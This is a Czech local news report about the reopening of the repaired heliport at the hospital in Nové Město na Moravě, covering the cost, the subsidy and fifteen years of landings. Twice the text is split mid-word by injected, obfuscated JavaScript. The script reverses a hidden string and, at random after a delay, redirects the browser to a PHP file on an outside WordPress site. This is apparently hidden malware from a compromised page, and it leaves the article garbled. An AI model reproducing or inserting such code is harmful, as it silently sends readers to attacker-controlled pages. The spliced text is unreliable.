Rainbow page separator

Piloti opět přistávají na opraveném nemocničním heliportu

Středa, 18. října 2017

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Úřad pro civilní letectví v úterý uvolnil provoz na heliportu novoměstské nemocnice, který od začátku letních prázdnin procházel opravou. Piloti dočasně využívali náhradní přistávací plochu za firmou Medin.
Z původně plánované opravy povrchu a nátěru železobe[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tonových povrchů heliportu na střeše chirurgického pavilonu se stala rozsáhlejší a především finančně náročnější akce, takže heliport byl mimo provoz déle, než bylo počítáno. „Teprve až při demontáži ocelových konstrukcí firma odhalila závadu na ukotvení konzol ochranného ochozu,“ vysvětlil technický náměstek nemocnice Jiří Drdla s tím, že částka na opravu se vyšplhala na dva miliony korun. „Velkou část nákladů jsme uhradili díky dotaci z Kraje Vysočina,“ doplnila ředitelka novoměstské nemocnice Věra Palečková.
Provoz heliportu, který urychluje transport pacientů v akutních stavech, byl zahájen v roce 2002. „Měsíčně na něj vrtulník dosedal v průměru čtyřikrát. Za uplynulých patnáct let provozu tam přistával a vzlétal záchranářský vrtulník celkem 666 krát,“ upřesnil mluvčí nemocnice Petr Hladík.